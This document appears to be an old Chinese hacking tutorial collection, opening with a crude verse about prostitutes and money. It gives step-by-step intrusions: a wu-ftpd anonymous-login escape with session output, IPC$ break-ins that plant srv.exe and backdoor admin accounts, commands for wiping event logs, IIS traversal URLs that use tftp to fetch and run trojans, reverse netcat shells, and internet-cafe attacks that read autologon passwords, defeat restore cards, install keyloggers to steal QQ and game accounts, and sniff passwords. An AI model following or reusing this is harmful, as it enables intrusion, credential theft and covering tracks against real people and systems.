黑暗世界

                       这世界只有两种人!
                       男人,女人!
                       男人分两种,色狼,和尚.
                       女人也分两种,免费,付费.
                       妓女,庸姿俗粉,床上的极品!
                       嫖客,嫖天下之美女,看天下之裸体!
                       这世界太黑暗!
                       一个字总结!

                       钱,万能的工具!
                       吾们今生都得为它奋斗!

FTP入侵

正文

利用伺服程式的缺陷入侵系统

  FTP入侵:wu-ftpd2.x版以前安全缺陷。
  wu-ftpd2.x是WashingtonUniversity(美国华盛顿大学)所研发出来的FTP伺服程式,广泛应用在各型UNIX主机上作为FTP伺服程式。它可以接受一般的用户签入,也提供以Anonymous或ftp为名的匿名签入以开放主机上的档案供大众Download用。其2.2版本以前有一个很严重的安全缺陷:一个匿名的使用者经由下列程序也可以取得一般使用者的权限进入系统磁碟:
  1.以任何一个FTPClient端程式连线到使用wu-ftpd2.x版以前架设的FTP站台。
  2.要求签入时,使用匿名帐号签入,但不要使用anonymous而使用FTP。
  3.在根目录下再次使用chdi/(cd/)命令,即可切换到一般系统目录而不只是公众目录。现在在此示范如何入侵网络上的一台please.hack.me主机,实例如下:(中文部分为注解)
  linux1:~#ftpplease.hack.me
  Connectedtoplease.hack.me
  220hackFTPserver(Versionwu-2.x(x)SunMay14:57:12CDT1993)ready.
  Name(linux1.twunix.org:root):ftp
  331Guestloginok,sendyourcompleteemailaddressaspassword.
  Password:
  230-Welcome,archiveuser!ThisisanexperimentalFTPserver.Ifhaveany
  230-unusualproblems,pleasereporthemviaemailtoroot@please
  230-Ifyoudohaveproblems,pleasetryusingadash(-)asthefirstcharacter
  230-ofyourpassword-thiswillturnoffthecontinuationmessagesthatmay
  230-beconfusingyourftpclient.
  230-
  230Guestloginok,accessrestrictionsapply.
  RemotesystemtypeisUNIX.
  Usingbinarymodetotransferfiles.
  ftp>ls-1一般匿名帐号进入后,先查看所在目录的内容。
  200PORTcommandsuccessful.
  150OpeningASCIImodedataconnectionfor/bin/ls.
  tota19
  drwxrwxr-x8rootwheel1024Sep1109:31.
  drwxrwxr-x8rootwheel1024Sep1109:31..
  drwxrwxr-x2rootwheel1024Sep1109:31bin
  drwxrwxr-x2rootwheel1024Sep1109:31etc
  drwxrwxr-x2rootwheel1024Dec31993incoming
  drwxrwxr-x2rootwheel1024Nov171993lib
  drwxrwxr-x2rootwheel1024Sep1109:31pub
  drwxrwxr-x3rootwheel1024Sep1109:31usr
  -rw-r–r–1rootroot312Aug11994welcome.msg
  226Transfercomplete.以一般匿名帐号进入后只能看到公众目录内容。
  ftp>pwd
  257"/"iscurrentdirectory.
  ftp>cd/虽然已经在根目录下,依然再次切换到/目录。
  250CWDcommandsuccessful.本来应该是要回应[无此目录]的(因为已经在最底层)但是依然可以继续切换。
  ftp>ls-1再次查验现在目录内容。
  200PORTcommandsuccessful.
  150OpeningASCIImodedataconnectionfor/bin/ls.
  total777
  drwxr-xr-x19rootroot1024ct608:58.
  drwxr-xr-x19rootroot1024ct608:58..
  drwxr-xr-x2rootbin2048Sep1117:31bin
  drwxr-xr-x2rootroot1024Sep1117:35boot
  drwxr-xr-x3rootroot2048Oct1400:03dev
  drwxr-xr-x9rootroot2048Oct1410:41etc
  drwxr-xr-x3rootroot1024Oct507:26ext
  drwxr-xr-x2rootroot1024Sep1109:42floppy
  drwxr-xr-x8rootroot1024Oct1111:52home
  drwxr-xr-x3rootroot1024Sep1117:27lib
  drwxr-xr-x2rootroot12288Sep1117:16lost+found
  drwxr-xr-x2rootroot1024Jul1013:23mnt
  dr-xr-xr-x5rootroot1408Oct408:03proc
  -rw——-1rootroot139424Sep2817:00quota.user
  drwxr-x-x3rootroot1024Sep2814:07root
  drwxr-xr-x2rootbin2048Sep1117:31sbin
  drwxr-xr-x2rootroot1024Sep1117:18shlib
  drwxrwxrwt3rootroot1024Oct1410:40tmp
  drwxr-xr-x24rootroot1024Jul81994usr
  drwxr-xr-x14rootroot1024Sep1117:32var
  -r———1rootroot596263Sep1117:33vmlinuz
  226Transfercomplete.已经变成一般系统目录了。
  ftp>
 
入侵原理解说:
  此一入侵是利用FTP公众匿名帐号anonymous,ftp其中后者的ftp正好与系统内定的FTP公众帐号名称相同,使得系统误以为ftp是一个已经登记的用户,而不是一个公众匿名帐号,而使其进入系统目录中。
  为什么会有这种现象发生呢?原来是FTP伺服程式将连线进来是使用者分为[匿名帐号]与[正式帐号]。如果是匿名帐号,则系统仅要求其输入自己的E-mail或是Ident资料当密码,就可以进入系统的/home/ftp目录中,而以/home/ftp当作此类使用者的根目录,这种用anonymous或是ftp当帐号匿名签入的使用者是没有办法切到系统目录中的(实际的/目录),再怎么下chdir/命令也只能到/home/ftp为止。
  而如果在/etc/password中登记有案的帐号,则以系统中实际的/为其根目录,此类使用者可以在其权限范围内浏览整个硬碟。
  而因为匿名帐号是以/home/ftp目录为起点,正好与ftp此一匿名帐号相同,故wu-ftpd2.x版以前的版本将会使用ftp签入的帐号视为一般User。(不过如果是用anonymous此一匿名帐号签入,就不会有这种情况了)
  使用ftp帐号并入侵到系统里面以后有什么好处呢?由于该入侵者已经可以完整浏览该硬碟,并享有一般User的权限,当然入侵者也可以进到/etc目录下,并读取passwd档案。如果该系统没有做shadow的话,那就大大方方地拿走passwd档案,然后回家利用类密码分析程式算出密码来。如果正好还破出root的密码的话,那就……嘿嘿~~~~
 
入侵防治方法:

  1.如果您的ftp伺服程式是wu-ftpd而且版本号低于2.4版,请尽快换到2.4版使用。
  2.将ftp帐号列入/ftp/ftpusers档案中,让匿名使用者只能利用anonymous此一匿名帐号签入。
  3.替系统安装ShadowPasswd。
  4.再次确认系统中没有叫做ftp或是anonymous的目录。
  5.改/etc/inetd.conf档案,关闭FTP服务。

网管和黑客都应知道的命令

网管和黑客都应知道的命令


  (与远程主机建立空管连接) net use file://IP/地址\ipc$ "" /use:""
  (以管理员身份登录远程主机) net use file://IP/地址\ipc$ "密码" /use:"Administrator"
  (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 file://IP/地址\admin$
  (查看远程主机时间) net time file://IP/地址
  (定时启动某个程序) at file://IP/地址 02:18 readme.exe
  (查看共享) net view file://IP/地址
  (查看netbios工作组列表) nbtsta* -* **地址
  (将远程主机C盘映射为自己的F盘) net use f: file://IP/地址\c$ ""/user:"Administrator"
  (这两条把自己增加到管理员组): net user 用户名 密码 /add
  net localgroup Administrators 用户名 /add
  (断开连接) net use file://IP/地址\ipc$ /delete
  扫尾:
  del C:\winnt\system32\logfiles\*.*
  del C:\winnt\ssytem32\config\*.evt
  del C:\winnt\system32\dtclog\*.*
  del C:\winnt\system32\*.log
  del C:\winnt\system32\*.txt
  del C:\winnt\*.txt
  del C:\winnt\*.log
  一、netsvc.exe
  下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
  netsvc /list file://IP/地址
  netsvc schedule file://IP/地址 /query
  netsvc file://IP/地址 schedule /start
  二、OpenTelnet.exe
  远程启动主机的Telnet服务,并绑定端口到7878,例如:
  OpenTelnet file://IP/地址 用户名 密码 1 7878
  然后就可以telnet到主机的7878端口,进入DOS方式下:
  telnet IP地址 7878     三、winshell.exe
  一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CM*>后,可打下面的命令:
  * *ath (查看winshell主程序的路径信息)
  b reBoot (重新启动机器)
  d shutDown (关闭机器)
  s Shell (执行后你就会看到可爱的“C:\>”)
  x eXit (退出本次登录会话,此命令并不终止winshell的运行)
  CMD> http://…/srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
  四、3389登陆器,GUI方式登录远程主机的
  五、elsave.exe
  事件日志清除工具
  elsave -s file://IP/地址 -l "application" -C
  elsave -s file://IP/地址 -l "system" -C
  elsave -s file://IP/地址 -l "security" -C
  执行后成功清除应用程序日志,系统日志,安全日志
  六、hbulot.exe
  开启win2kserver和winxp的3389服务
  hbulot [/r]
  使用/r表示安装完成后自动重起目标使设置生效。
  七、nc.exe(netcat.exe)
  一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
  想要连接到某处: nc [-options] hostname port[s] [ports] …
  绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
  参数:
  -e prog 程序重定向,一旦连接,就执行 [危险!!]
  -g gateway source-routing hop point[s], up to 8
  -G num source-routing pointer: 4, 8, 12, …
  -h 帮助信息
  -i secs 延时的间隔
  -l 监听模式,用于入站连接
  -n 指定数字的IP地址,不能用hostname
  -o file 记录16进制的传输
  -p port 本地端口号
  -r 任意指定本地及远程端口
  -s addr 本地源地址
  -u UDP模式
  -v 详细输出——用两个-v可得到更详细的内容
  -w secs timeout的时间
  -z 将输入输出关掉——用于扫描时 八、TFTPD32.EXE
  把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
  http://ip/地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
  然后可以直接令文件运行:
  http://ip/地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名     九、prihack.exe是IIS的printer远程缓冲区溢出工具。
  idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
  一○、nti*.**e、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
  一、一 Xscan命令行运行参数说明:
  在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按""强行关闭程序。
  1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
  xscan -file <主机列表文件名> <检测项目> [其他选项]
  其中<检测项目> 含义如下:
  -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
  -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
  -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
  -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
  -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
  [其他选项] 含义如下:
  -v: 显示详细扫描进度
  -p: 跳过Ping不通的主机
  -o: 跳过没有检测到开放端口的主机
  -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10

常见端口入侵

各种常见端口入侵

SQLScanPas*.**e 进行字典暴破(字典是关键)
最后 SQLTool*.**e入侵
=============================
对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
(以上反向的,测试成功)
sqlhelloz.exe 入侵ip 1433 (这个是正向连接)

2. 4899端口入侵
用4899过滤器.exe,扫描空口令的机器

3. 3899的入侵
对很早的机器,可以试试3389的溢出(win3389ex.exe)
对2000的机器,可以试试字典暴破。(tscrack.exe)

4. 80入侵
对sp3以前的机器,可以用webdav入侵;
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
可以利用SQL进行注入。(小榕的注入软件)。

5. serv-u入侵(21端口)
对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
======================================
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A

6. 554端口
用real554.exe入侵。

7. 6129端口
用DameWare6129.exe入侵。

8. 系统漏洞
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
进行溢出入侵。

9. 3127等端口
可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。

10. 其他入侵
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。

经典IPC$入侵
1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
  
2. C:\>copy srv.exe \\127.0.0.1\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
  
3. C:\>net time \\127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
  
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)
  
5. C:\>net time \\127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
  
6. C:\>telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
  
7.C:\>copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
  
8. C:\WINNT\system32>ntlm
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!

9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)

为了以防万一,我们再把guest激活加到管理组
10. C:\>net user guest /active:yes
将对方的Guest用户激活

11. C:\>net user guest 1234
将Guest的密码改为1234,或者你要设定的密码

12. C:\>net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)

网吧入侵

网吧入侵

  入侵的方法很多,但对网吧入侵最常用的方法是什么呢?首先,自动登陆。现在网吧一般都是win2000或者windows xp的机器,网管一般都把机子设置为自动登陆!这样我们开机进入系统的时候登陆窗口一闪而过!着时候如果我们findfas*.**e试图把登陆账号密码找出来是不会成功的!因为账号密码根本不在内存中,而findfas*.**e通过winlogon的PID号和正确的域名中,在内存寻找好段加了密的内存块(保存着加密过的登陆密码),然后对它进行解密,这样就能得到明文的密码。实际上自动登陆的账号密码都在注册表中。我们打开注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\这个目录下,AutoAdminLogon这一项的键值为1,表示自动登陆。为1的时候,打开控制面板的用户和密码,会发现需要密码前面的钩已经去掉了。DefaultUserName对应的键值就是登陆用户名,DefaultPassword对应的键值就是登陆密码。实际上海洋顶端木马2006就有着一功能,原理是一样的,不过因为权限的问题,不一定能读出来。这样,密码账号我们都找出来了。而且你要知道,一个网吧的自动登陆密码账号一般都是一样的,而且网管为了方便网虫上网一般把他们设置在管理员组,至少user组。知道了密码账号还愁入侵不了么?网吧机子的server服务一般是禁用的,那我们就不能用ipc入侵了。opentelnet.exe我们也用不了,因为着个也依赖ipc连接,dameware远程控制也不行,道理一样。我们可以用recton着个小巧实用的工具来开telnet,这个工具在win2000下面特别好使。
如图1。
开了telnet后,我们telnet上去,先在本机打开tftpd32.exe,再telnet下面telnet -i myip get 3721.exe c:\3721.exe,这样就把我们的木马3721.exe比如radmin传过去了。
如图2。再在telnet下面直接运行3721.exe就ok了。
    另一个方法就是ms04011漏洞,别以为着个漏洞已经过时了,在网吧这个漏洞还是相当普遍的,许多网吧的网管只会装游戏,重装系统,不重视着写漏洞,懒得打补丁!我们用DSScan扫描192.168.0.1-192.168.0.255,一般会你会很惊喜的。我们到用ms04011溢出工具溢出,一下子就得到了系统权限。
如图3.
    还有很多入侵方法,你可以把xscan搬出来扫描一下。很多菜鸟喜欢用啊D工具包来扫网吧的空口令,实际上这个工具扫用户账号密码很弱,以前我试过,我用上面第一种方法发现网吧都有一个密码为空的管理员账号,用啊D工具包只扫出几台机子有这个账号。我经常用我的最爱
闪电狐——火狐端口扫描器来扫一下网吧主机,第一服务器等。着个扫描器速度很快,扫1到10000端口也要不了几分钟。如果发现服务器开80断口,自然是看是不是架设了网站。再看网站十分有漏洞,想办法传个asp木马上去提升权限。如果发现电影服务器装了serv_u,而且你有了一个账号,可以尝试一下serv_u的溢出。
                                                  二.网吧牧马
在网吧安装木马最重要的是把它的还原破了,现在网吧的还原系统一般有3种,即还原卡,还原精灵,冰点还原精灵。硬盘还原卡其实所谓硬盘保护卡就是在ROM中写了一段HOOK INT 13的程序,屏蔽了
一些功能调用如AH=3,5等,在中断向量表中INT 13的SEG,OFFSET
描述为[13h*4+2],[13h*4],将此中的程序先保存后,再替换为自己的代码,
当你AH=2的时,它便会call原始INT 13地址来完成(商周)作.
只要找到原始INT 13入口便可以为所欲为.
具体过程如下:
开机过程按住F8键,进入纯dos环境, 注";"后为注释.
出现提示符c:,
键入c:\debug,
– a100
– xor ax,ax
– int 13
– int3
; 寻找原始的int 13入口.
然后输入t回车,不断的重复,直到显示的地址形如 F000:xxxx
,后面的指令为:mov dl,80 (练练眼力-。按q退出.
记下这一地址, 在(0:13H*4)=0:4cH 处填入这个地址。
例如俺的得到的地址是F000:9A95
再次运行debug ,键入:
-e 0:4c 95 9A 00 F0 e的作用将数据表"95 9A 00 f0",写入地址0:4c开始的字节中.
-q
注: 填的时候要仔细,填错的话会死机。ok,破解完成.
这时在提示符c:\键入
c:\win
进入windows系统即可,那么这次你在windows系统中的一切(商周)作,随着下一次
的启动都会被还原卡存储起来。
这种办法大家都知道,不过操作起来也有点危险,弄不好启动不了。而且win2000没有dos环境,到底性不行呢?呵呵,我还没有
做这个危险的尝试。不过望上有很多关于破解还原卡的工具可以下载,到底什么工具最好使,大家自己测试。
至于还原卡,网上有密码读取器,不过着工具只能在win98下面使用。在win2k下面我们可以用winhex来破解,次方法很奏效,
应该是最好的办法。先随便输个错误的密码,弹出错误窗口后不动,用winhex查找主要内存,找到还原精灵,再搜索我们开始
输的错误密码。在错误密码的旁边应该就有正确的密码。我们输入正确的密码转存就行了。这里很简单,就不截图了!
   至于冰点还原,好像还没有破解办法,这个的确很厉害。不过他有个选项,就是重启多少次后不还原,没事你可以多重启
试一下,别把机子整坏了就行。
   破了还原后就装木马了。我们最好装键盘记录或密码截获木马,盗qq,游戏账号,邮箱账号等等。比如密码结巴等工具,也可以
把浏览器默认主页设置为你的网页木马。如果网吧的默认主页都是一样,而你有能力入侵了那个网站,在默认主页上挂马那更好!

                                      三.网吧嗅探。
   如果你想知道网吧某个mm的qq号,那你就用QQSniffer,Ver2005build5.5。也可以用xniffer,用于嗅探域网中或本机的pop.smtp.ftp等明文传输的tcp/ip协议密码。格式是 xsiff.exe -pass -hide -log pass.log  xsiff.exe -tcp -udp -asc -addr 192.168.1.1。如果你不喜欢着个,还有个密码监听器,密码监听器用于监听网页的密码,包括网页上的邮箱、论坛、聊天室等等。只需在一台电脑上运行,就可以监听局域网内任意一台电脑登录的账号和密码,并将密码显示、保存,或发送到用户指定的邮箱。我就经常有密码监听器2.4破解版在网吧监听别人
密码!当然网吧最适合dns欺骗!
如图3。
                                       四.端口转发。
   为了能随时随地控制网吧机器,在家也可以!我们最好来个端口转发。首先我们可以用fport.exe(这个工具在angelshell1.0包里面有),格式为fport 但是使用他可以不必安装后门,只需要普通的权限即可执行。网吧服务器一般是win2000server版的,我们趁管理员不注意,给他开3389。如果他的ip为192.168.0.1,我们就在他的命令行下执行fport.exe 3389 myip 9999,这里的myip可以是我们的一只有公网ip的肉鸡。我们再在公网ip的肉鸡上运行FportClient.exe着个是客户端。着样我们登陆公网ip的肉鸡的9999端口就进了网吧主机。在上面看第电影赶什么都行,不被发现就行了,我们动作轻点就行了。我们也可以给网吧主机装代理。就用htran2.4,SocksCap。在网吧主机命令行下上执行htran.exe -install (安装Socks5服务),htran.exe -start (启动Socks5服务),再执行"htran.exe -s -connect 共网肉鸡ip 3389。在自己的共网肉鸡上执行htran.exe -s -listen 3389 5200(监听端口).现在用SocksCap连接 218.3.1.1 的5200端口,就等于进入了网吧主机。我们也可以
用vidc来映射端口,这个和fport差不多就不多说了